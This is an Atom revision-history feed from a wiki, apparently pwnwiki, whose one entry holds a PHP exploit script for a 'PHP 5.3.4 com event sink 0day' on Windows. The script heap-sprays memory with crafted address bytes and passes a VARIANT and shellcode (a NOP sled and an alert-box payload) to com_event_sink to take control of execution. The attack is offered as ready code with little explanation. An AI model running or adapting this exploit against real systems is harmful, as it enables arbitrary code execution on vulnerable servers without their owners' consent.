<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=PHP_5.3.4_com_event_sink_0day</id>
	<title>PHP 5.3.4 com event sink 0day - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=PHP_5.3.4_com_event_sink_0day"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=PHP_5.3.4_com_event_sink_0day&amp;action=history"/>
	<updated>2026-04-16T22:29:42Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=PHP_5.3.4_com_event_sink_0day&amp;diff=727&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; &lt;?php  //PHP 5.3.4     // //$eip =&quot;\x44\x43\x42\x41&quot;; $eip= &quot;\x4b\xe8\x57\x78&quot;; $eax =&quot;\x80\x01\x8d\x04&quot;; $deodrant=&quot;&quot;; $axespray = str_repeat($eip.$eax,0x80);...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=PHP_5.3.4_com_event_sink_0day&amp;diff=727&amp;oldid=prev"/>
		<updated>2021-03-27T03:38:16Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; &amp;lt;?php  //PHP 5.3.4     // //$eip =&amp;quot;\x44\x43\x42\x41&amp;quot;; $eip= &amp;quot;\x4b\xe8\x57\x78&amp;quot;; $eax =&amp;quot;\x80\x01\x8d\x04&amp;quot;; $deodrant=&amp;quot;&amp;quot;; $axespray = str_repeat($eip.$eax,0x80);...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;?php&lt;br /&gt;
 //PHP 5.3.4 &lt;br /&gt;
 &lt;br /&gt;
 //&lt;br /&gt;
//$eip =&amp;quot;\x44\x43\x42\x41&amp;quot;;&lt;br /&gt;
$eip= &amp;quot;\x4b\xe8\x57\x78&amp;quot;;&lt;br /&gt;
$eax =&amp;quot;\x80\x01\x8d\x04&amp;quot;;&lt;br /&gt;
$deodrant=&amp;quot;&amp;quot;;&lt;br /&gt;
$axespray = str_repeat($eip.$eax,0x80);&lt;br /&gt;
&lt;br /&gt;
//048d0190&lt;br /&gt;
echo strlen($axespray);&lt;br /&gt;
echo  &amp;quot;PHP 5.3.4 WIN Com Module COM_SINK 0-day\n&amp;quot; ;&lt;br /&gt;
echo  &amp;quot;By Rahul Sasi : http://twitter.com/fb1h2s\n&amp;quot; ;&lt;br /&gt;
echo  &amp;quot;Exploit Tested on:\n Microsoft XP Pro 2002 SP2 \n&amp;quot; ;&lt;br /&gt;
echo  &amp;quot;More Details Here:\n http://www.garage4hackers.com/blogs/8/web-app-remote-code-execution-via-scripting-engines-part-1-local-exploits-php-0-day-394/\n&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
//19200 ==4B32 4b00&lt;br /&gt;
for($axeeffect=0;$axeeffect&amp;lt;0x4B32;$axeeffect++)&lt;br /&gt;
{&lt;br /&gt;
    $deodrant.=$axespray;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
$terminate = &amp;quot;T&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
$u[] =$deodrant;&lt;br /&gt;
&lt;br /&gt;
$r[] =$deodrant.$terminate;&lt;br /&gt;
$a[] =$deodrant.$terminate;&lt;br /&gt;
$s[] =$deodrant.$terminate;&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
//$vVar = new VARIANT(0x048d0038+$offset); // This is what we controll&lt;br /&gt;
$vVar = new VARIANT(0x048d0000+180); &lt;br /&gt;
//alert box Shellcode &lt;br /&gt;
$buffer = &amp;quot;\x90\x90\x90&amp;quot;.&lt;br /&gt;
          &amp;quot;\xB9\x38\xDD\x82\x7C\x33\xC0\xBB&amp;quot;.&lt;br /&gt;
            &amp;quot;\xD8\x0A\x86\x7C\x51\x50\xFF\xd3&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
$var2 = new VARIANT(0x41414242);&lt;br /&gt;
&lt;br /&gt;
com_event_sink($vVar,$var2,$buffer);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>